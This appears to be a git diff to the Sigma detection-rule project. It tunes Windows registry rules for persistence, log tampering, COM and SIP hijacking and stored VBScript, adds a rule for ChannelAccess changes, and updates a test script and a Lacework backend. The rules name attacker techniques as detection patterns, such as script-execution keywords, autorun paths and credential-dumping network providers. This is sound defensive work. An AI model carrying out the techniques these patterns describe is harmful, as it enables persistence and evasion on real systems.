a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/09/06 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -103,8 +103,10 @@ detection: - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: - TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' - Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' + TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{' + Details|contains|all: + - '\AppData\Local\Package Cache\{' + - '}\python-' Details|endswith: '.exe" /burn.runonce' filter_officeclicktorun: Image|startswith: @@ -125,6 +127,12 @@ detection: - '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui' - '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui' - '{472083B0-C522-11CF-8763-00608CC02F24}' + filter_aurora_dashbaord: + Image|endswith: + - '\aurora-agent-64.exe' + - '\aurora-agent.exe' + TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard' + Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe' condition: all of current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 0fe1f398d..31626072c 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/05 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -72,6 +72,9 @@ detection: Image|endswith: '\OfficeClickToRun.exe' filter_ms_win_desktop_runtime: Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-' + filter_vcredist: + Image|endswith: '\VC_redist.x64.exe' + Details|endswith: '}\VC_redist.x64.exe" /burn.runonce' condition: all of wow_current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml new file mode 100644 index 000000000..234213d68 --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml @@ -0,0 +1,30 @@ +title: Change Winevt Event Access Permission Via Registry +id: 7d9263bd-dc47-4a58-bc92-5474abab390c +description: Detects tampering with the "ChannelAccess" registry key in order to change access to windows event channel +author: frack113 +date: 2022/09/17 +status: experimental +references: + - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ + - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ + - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ +logsource: + category: registry_set + product: windows +detection: + selection: + EventType: SetValue + TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\' + TargetObject|endswith: '\ChannelAccess' + # Add more interesting combinations if you found them + Details|contains: + - '(A;;0x1;;;SY)' # Local System having GENERIC ALL + - '(A;;0x5;;;BA)' # Built-in administrators having GENERIC ALL and GENERIC WRITE + - '(A;;0x1;;;LA)' # Local administrator having GENERIC ALL + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1562.002 diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 5caf99e9d..72d5abdd5 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2022/08/01 +modified: 2022/09/18 logsource: category: registry_set product: windows @@ -22,7 +23,9 @@ detection: - '\Enabled' - '\Start' Details: DWORD (0x00000000) - condition: all of selection* + filter_legitimate: + Image: 'C:\Windows\system32\wevtutil.exe' + condition: all of selection* and not 1 of filter* falsepositives: - Unknown level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 04c010857..08ad446bf 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/08 +modified: 2022/09/20 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -27,7 +27,9 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\' + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml @@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' @@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 diff --git a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml index eaa29e421..c44153a11 100644 --- a/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml +++ b/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml @@ -3,7 +3,7 @@ id: 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious status: experimental date: 2021/06/18 -modified: 2022/08/24 +modified: 2022/09/16 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://labs.f-secure.com/blog/scheduled-task-tampering/ @@ -26,9 +26,11 @@ detection: filter_svchost: Image: 'C:\WINDOWS\system32\svchost.exe' filter_ngen: - Image|startswith: 'C:\Windows\Microsoft.NET\Framework\' + Image|startswith: 'C:\Windows\Microsoft.NET\Framework' # \Framework\ and \Framework64\ Image|endswith: '\ngen.exe' - TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + TargetObject|contains: + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B66B135D-DA06-4FC4-95F8-7458E1D10129}' + - '\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\.NET Framework\.NET Framework NGEN' filter_office_click_to_run: Image: - 'C:\Program Files\Microsoft Office\root\Integration\Integrator.exe' diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml +++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 4c3929b90..1c9bae2f7 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -12,6 +12,24 @@ if [[ -z $(command -v wget) ]]; then exit 1 fi +if [[ -z $(command -v xargs) ]]; then + >2& echo "xargs not found. Please install findutils." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v tar) ]]; then + >2& echo "tar not found. Please install." + >2& echo "Exiting" + exit 1 +fi + +if [[ -z $(command -v mktemp) ]]; then + >2& echo "mktemp not found. Please install coreutils." + >2& echo "Exiting" + exit 1 +fi + if [[ -z $(command -v realpath) ]]; then >2& echo "realpath not found. Please install coreutils." >2& echo "Exiting" @@ -95,6 +113,7 @@ PID2OS[$!]=$OS # Windows 10 OS="Windows 10" { + sleep 10 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz tar xzf win10-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -107,6 +126,7 @@ PID2OS[$!]=$OS # Windows 2022 AD OS="Windows 2022 AD" { + sleep 20 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz tar xzf win2022-ad.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -119,6 +139,7 @@ PID2OS[$!]=$OS # Windows 11 OS="Windows 11" { + sleep 30 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz tar xzf win11-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" @@ -128,6 +149,19 @@ OS="Windows 11" pids+=($!) PID2OS[$!]=$OS +# Windows 2022.0.20348 Azure +OS="Windows 2022.0.20348 Azure" +{ + sleep 40 + wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" + ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json + echo " Finished Checking for Sigma matches in $OS baseline" +}& +pids+=($!) +PID2OS[$!]=$OS + # Sync with all background jobs for pid in ${pids[*]}; do echo "===> Waiting for PID $pid / ${PID2OS[$pid]}" @@ -153,6 +187,9 @@ echo "Windows 2022:" echo echo "Windows 2022 AD:" "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv +echo +echo "Windows 2022.0.20348 Azure:" +"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv echo read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 01b6d3de5..11bc25aa4 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -166,3 +166,18 @@ logsources: service: bits-client conditions: Channel: 'Microsoft-Windows-Bits-Client/Operational' + windows-diagnosis-scripted: + product: windows + service: diagnosis-scripted + conditions: + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' + windows-shell-core: + product: windows + service: shell-core + conditions: + Channel: 'Microsoft-Windows-Shell-Core/Operational' + security-mitigations: + product: windows + service: security-mitigations + conditions: + Provider_Name: 'Microsoft-Windows-Security-Mitigations' \ No newline at end of file diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index f3c5eb870..df4e60f0c 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( textwrap.dedent(''' --- - version: 0.3 + version: 0.4 services: cloudtrail: - evaluatorId: Cloudtrail source: CloudTrailRawEvents fieldMap: - sigmaField: eventName @@ -67,8 +66,8 @@ LACEWORK_CONFIG = yaml.load( alertProfile: LW_CloudTrail_Alerts product.categories: linux.file_create: - evaluatorId: - source: LW_HE_FILES + sources: + - LW_HE_FILES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(FILE_CREATED_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -87,9 +86,40 @@ LACEWORK_CONFIG = yaml.load( - OWNER_USERNAME - FILE_CREATED_TIME alertProfile: LW_HE_FILES_DEFAULT_PROFILE.HE_File_NewViolation + linux.network_connection: + sources: + - LW_HA_CONNECTION_SUMMARY as HACM + - array_to_rows(ENDPOINT_DETAILS) as (EP_PA) + fieldMap: + - sigmaField: Image + laceworkField: EXE_PATH + matchType: exact + action: selfjoin + selfJoinFilter: HACM.SRC_ENTITY_TYPE = 'Process' AND (HACM.SRC_ENTITY_ID:mid::NUMBER, HACM.SRC_ENTITY_ID:pid_hash::NUMBER) IN { source { LW_HE_PROCESSES AS HEP } filter { EXE_PATH like '%/bin/bash' } return { HEP.MID, HEP.PID_HASH }} + - sigmaField: DestinationIp + laceworkField: EP_PA:dst_ip_addr + matchType: exact + - sigmaField: DestinationHostname + laceworkField: + matchType: exact + action: raise + returns: + - HACM.BATCH_END_TIME + - HACM.BATCH_START_TIME + - HACM.DST_ENTITY_ID + - HACM.DST_ENTITY_TYPE + - HACM.DST_IN_BYTES + - HACM.DST_OUT_BYTES + - HACM.ENDPOINT_DETAILS + - HACM.NUM_CONNS + - HACM.SRC_ENTITY_ID + - HACM.SRC_ENTITY_TYPE + - HACM.SRC_IN_BYTES + - HACM.SRC_OUT_BYTES + alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation linux.process_creation: - evaluatorId: - source: LW_HE_PROCESSES + sources: + - LW_HE_PROCESSES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -489,22 +519,18 @@ class LaceworkQuery: self.logsource_config = self.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator ID - self.evaluator_id = self.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Query ID + # 3. Get Query ID self.title, self.query_id = self.get_query_id(rule) - # 5. Get Query Source - self.query_source = self.get_query_source( + # 4. Get Query Source + self.query_sources = self.get_query_sources( self.logsource_name, self.logsource_config) - # 6. Get Query Returns + # 5. Get Query Returns self.returns = self.get_query_returns( self.logsource_name, self.logsource_config) - # 7. Get Query Text + # 6. Get Query Text self.query_text = self.get_query_text(backend, conditions) def get_query_text(self, backend, rule_conditions): @@ -539,8 +565,9 @@ class LaceworkQuery: ' {source}\n' ' }}' ) + return source_block_template.format( - source=self.query_source + source=',\n '.join(self.query_sources) ) def get_query_return_block(self): @@ -555,7 +582,6 @@ class LaceworkQuery: def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'queryId': 'query_id', 'queryText': 'query_text' }.items(): @@ -623,12 +649,6 @@ class LaceworkQuery: return logsource_config - @staticmethod - def get_evaluator_id(logsource_name, logsource_config): - # 3. validate service has an evaluatorId mapping - evaluator_id = safe_get(logsource_config, 'evaluatorId', str) - return evaluator_id if evaluator_id else None - @staticmethod def get_query_id(rule): title = safe_get(rule, 'title', str) or 'Unknown' @@ -638,15 +658,18 @@ class LaceworkQuery: return title, query_id @staticmethod - def get_query_source(logsource_name, logsource_config): + def get_query_sources(logsource_name, logsource_config) -> list[str]: # 4. validate service has a source mapping source = safe_get(logsource_config, 'source', str) + sources = safe_get(logsource_config, 'sources', list) - if not source: - raise BackendError( - f'Lacework backend could not determine source for logsource {logsource_name}') + if sources: + return sources + elif source: + return [source] - return source + raise BackendError( + f'Lacework backend could not determine source for logsource {logsource_name}') @staticmethod def get_query_returns(logsource_name, logsource_config): @@ -703,42 +726,37 @@ class LaceworkPolicy: self.logsource_config = LaceworkQuery.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator Id - self.evaluator_id = LaceworkQuery.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Title - # 5. Get Query ID + # 3. Get Title + # 4. Get Query ID self.title, self.query_id = LaceworkQuery.get_query_id(rule) - # 6. Get Enabled + # 5. Get Enabled self.enabled = False - # 7. Get Policy Type + # 6. Get Policy Type self.policy_type = 'Violation' - # 8. Get Alert Enabled + # 7. Get Alert Enabled self.alert_enabled = False - # 9. Get Alert Profile + # 8. Get Alert Profile self.alert_profile = self.get_alert_profile( self.logsource_name, self.logsource_config) - # 10. Get Limit + # 9. Get Limit self.limit = 1000 - # 11. Get Severity + # 10. Get Severity self.severity = safe_get(rule, 'level', str) or 'medium' - # 12. Get Description + # 11. Get Description self.description = safe_get(rule, 'description', str) - # 13. Get Remediation + # 12. Get Remediation self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'title': 'title', 'enabled': 'enabled', 'policyType': 'policy_type',